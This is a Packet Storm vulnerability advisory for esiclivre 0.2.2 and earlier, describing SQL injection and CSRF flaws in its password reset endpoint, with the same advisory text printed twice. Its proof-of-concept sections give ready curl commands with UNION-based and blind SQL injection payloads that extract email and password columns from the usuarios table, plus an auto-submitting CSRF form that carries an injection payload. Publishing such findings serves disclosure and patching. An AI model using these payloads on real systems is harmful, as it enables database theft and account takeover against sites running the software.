Description
The password reset functionality in esiclivre is affected by multiple vulnerabilities. The cpfcnpj parameter is vulnerable to Blind SQL injection due to improper input handling. Additionally, the endpoint lacks CSRF protection, input validation, and...
Basic Information
ID
PACKETSTORM:219565
Published
Apr 22, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : esiclivre <= 0.2.2 - Multiple Vulnerabilities |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/esiclivre/esiclivre/blob/master/reset/index.php |
==================================================================================================================================
[+] Summary : The password reset functionality in esiclivre is affected by multiple vulnerabilities.
The cpfcnpj parameter is vulnerable to Blind SQL injection due to improper input handling.
Additionally, the endpoint lacks CSRF protection, input validation, and rate limiting,
enabling attackers to perform user enumeration, injection attacks, and abuse the password reset mechanism.
[+] POC :
Blind SQL Injection (UNION-based and Blind techniques) :
curl -X POST http://target/reset/index.php -d "cpfcnpj=0' UNION SELECT email,senha,3,4,5 FROM usuarios-- -"
curl -X POST http://target/reset/index.php -d "cpfcnpj=123' AND (SELECT SUBSTRING(@@version,1,1))='5"
CSRF Attack :
<form action="https://target/reset/index.php" method="POST">
<input type="hidden" name="cpfcnpj" value="' OR 1=1-- ">
<input type="submit">
</form>
<script>
document.forms[0].submit();
</script>
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : esiclivre <= 0.2.2 - Multiple Vulnerabilities |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/esiclivre/esiclivre/blob/master/reset/index.php |
==================================================================================================================================
[+] Summary : The password reset functionality in esiclivre is affected by multiple vulnerabilities.
The cpfcnpj parameter is vulnerable to Blind SQL injection due to improper input handling.
Additionally, the endpoint lacks CSRF protection, input validation, and rate limiting,
enabling attackers to perform user enumeration, injection attacks, and abuse the password reset mechanism.
[+] POC :
Blind SQL Injection (UNION-based and Blind techniques) :
curl -X POST http://target/reset/index.php -d "cpfcnpj=0' UNION SELECT email,senha,3,4,5 FROM usuarios-- -"
curl -X POST http://target/reset/index.php -d "cpfcnpj=123' AND (SELECT SUBSTRING(@@version,1,1))='5"
CSRF Attack :
<form action="https://target/reset/index.php" method="POST">
<input type="hidden" name="cpfcnpj" value="' OR 1=1-- ">
<input type="submit">
</form>
<script>
document.forms[0].submit();
</script>
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================